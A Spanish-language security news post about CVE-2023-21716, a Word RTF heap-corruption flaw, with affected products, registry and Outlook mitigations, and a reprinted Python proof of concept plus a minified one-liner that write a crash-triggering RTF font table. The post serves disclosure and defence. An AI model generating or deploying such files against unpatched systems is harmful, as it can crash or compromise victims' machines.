Los investigadores publicaron los detalles de la vulnerabilidad de día cero de MS Office y el código de explotación CVE-2023-21716

ESantos
Mar 13, 2023
Seguridad
476

El 14 de febrero de 2023, Microsoft publicó un documento informativo de seguridad para CVE-2023-21716, una vulnerabilidad crítica de ejecución remota de código en Microsoft Word. Si bien CVE-2023-21716 se consideró de gravedad crítica, Microsoft evaluó en el momento de la publicación que era "menos probable" que la vulnerabilidad fuera explotada y que no había ninguna vulnerabilidad disponible de prueba de concepto. Microsoft también señaló que la vulnerabilidad puede ser explotada a través del Panel de vista previa en Microsoft Outlook.

El 5 de marzo de 2023, un investigador de seguridad lanzó en Twitter un exploit de prueba de concepto para CVE-2023-21716. Este exploit permite crear documentos que aprovechen CVE-2023-21716 para provocar un bloqueo de la aplicación en Microsoft Word.

Las técnicas para abusar de los documentos de Microsoft Office son frecuentemente buscadas y utilizadas como armas por los actores de amenazas. Al inyectar código arbitrario en los documentos que se adjuntan por correo electrónico, pueden obtener acceso inicial a un entorno, lo que les permite moverse lateralmente y causar más daño. Los actores de amenazas han abusado de las macros VBA para este propósito, y Microsoft deshabilitó recientemente las macros VBA de forma predeterminada para los documentos descargados de la web.

¿Qué es la vulnerabilidad CVE-2023-21716?

La vulnerabilidad CVE-2023-21716 se reveló de forma privada a Microsoft en noviembre de 2022, y Microsoft abordó la vulnerabilidad en sus actualizaciones de Patch Tuesday el 14 de febrero de 2023. La vulnerabilidad es una vulnerabilidad de corrupción del montón encontrada en el analizador RTF de MS Office Word. Cuando se explota, la vulnerabilidad permite a los adversarios ejecutar comandos arbitrarios con los privilegios de la víctima a través de archivos RTF maliciosos. Incluso cargar el documento RTF malicioso en el panel de vista previa es suficiente para la explotación, y las víctimas no tienen que abrir la carga útil. Debido a la baja complejidad y el alto impacto de la explotación potencial, la vulnerabilidad CVE-2023-21716 tiene una puntuación CVSS de 9,8 (Crítico).

Los siguientes productos de Microsoft están afectados por la vulnerabilidad CVE-2023-21716 y se recomienda a los usuarios que revisen sus productos vulnerables lo antes posible.

Productos afectados

Producto	Actualizar
Aplicaciones de Microsoft 365 para empresas Microsoft Office LTSC Microsoft Office 2019 Microsoft Office Web Apps Server 2013 Microsoft Office Online Server Microsoft SharePoint Server 2019 Microsoft SharePoint Enterprise Server 2016 Microsoft SharePoint Enterprise Server 2013 Microsoft SharePoint Foundation 2013 Microsoft SharePoint Server Subscription Edition Microsoft Word 2016 Microsoft Word 2013 Microsoft Word 2013 RT	Consulte la sección "Actualizaciones de seguridad" en el siguiente documento informativo para obtener vínculos de descarga: Guía de actualización de seguridad – Centro de respuestas de seguridad de Microsoft
Microsoft Office LTSC para Mac 2021 Microsoft Office 2019 para Mac	Consulte la sección "Actualizaciones de seguridad" en el siguiente documento informativo para obtener vínculos de descarga: Guía de actualización de seguridad – Centro de respuestas de seguridad de Microsoft

(CVE-2023-21716) Código de explotación POC

{% highlight Python %}
#!/usr/bin/python
#
# PoC for:
# Microsoft Word RTF Font Table Heap Corruption Vulnerability
#
# by Joshua J. Drake (@jduck)
#

import sys

# allow overriding the number of fonts
num = 32761
if len(sys.argv) > 1:
	num = int(sys.argv[1])

f = open("tezt.rtf", "wb")
f.write("{\\rtf1{\n{\\fonttbl")
for i in range(num):
	f.write("{\\f%dA;}\n" % i)
f.write("}\n")
f.write("{\\rtlch it didn't crash?? no calc?! BOO!!!}\n")
f.write("}}\n")
f.close()
{% endhighlight %}

Código Minificado

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

Si la aplicación de parches a los productos vulnerables no es una opción, los usuarios pueden aplicar las siguientes soluciones para limitar las posibles vulnerabilidades de CVE-2023-21716.

Configurar Microsoft Outlook para leer todo el correo estándar en texto sin formato
Utilice la directiva de bloqueo de archivos de Microsoft Office para evitar que MS Office abra documentos RTF de fuentes que no sean de confianza.
- Cambie el valor DWORD de RtfFiles a 2 y el valor DWORD de OpenInProtectedView a 0 para los siguientes registros
  - Office 2013: HKCU\Software\Microsoft\Office\15.0\Word\Security\FileBlock
  - Office 2016, 2019, 2021: HKCU\Software\Microsoft\Office\16.0\Word\Security\FileBlock

Toma todas las medidas recomendadas, para no ser una victima más de los ciberdelincuentes. y ten mucho cuidado al momento de reparar el error llamado CVE-2023-21716, ya que puede dejar la puerta abierta a los ciberdelincuentes y exponer tu seguridad e información.

fuente:

CVE-2023-21716 - Guía de actualización de seguridad - Microsoft - Vulnerabilidad de ejecución remota de código en Microsoft Word

NVD - CVE-2023-21716 (nist.gov)

Solución al error de actualización de Windows CVE-2023-21716: resuelto con corrección (800error.com)